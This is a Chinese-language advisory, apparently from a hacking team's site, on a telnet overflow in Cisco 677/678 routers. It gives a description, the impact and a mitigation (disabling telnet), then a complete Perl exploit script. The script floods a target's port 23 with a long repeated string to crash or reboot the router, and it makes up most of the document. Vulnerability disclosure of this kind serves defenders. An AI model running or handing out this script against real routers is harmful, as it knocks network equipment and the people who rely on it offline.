|
Cisco 677/678 Telnet 溢出漏洞
翻译整理 :cnhackTNT
Team :C4ST
Web :Http://www.china4lert.org
Http://www.netdoc.cn.st
Email:cnhacktnt@hotmail.com
Cisco 677/678路由器的telnet服务存在溢出漏洞
<漏洞描述>:
当发送一个超长的字符串给目标服务器的23端口时,路由器
的telnet将产生溢出.
<危害>:
该溢出导致路由器拒绝服务甚至重新启动,至今有关的ISP仍然没有
引起注视.
<解决方法>:
关闭路由器的telnet服务
<测试exploit>:
#--------------------cisco677.pl------------------
#!/usr/bin/perl
#
# close your Cisco 677 up on the Telnet server!
# Made for fun only! port 23 is the Telnet server port on the router
# By DNV THX to DKW-stuff
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}
#-------------------------------------------------
原文:http://www.deadmeat.dk
Author:DNV |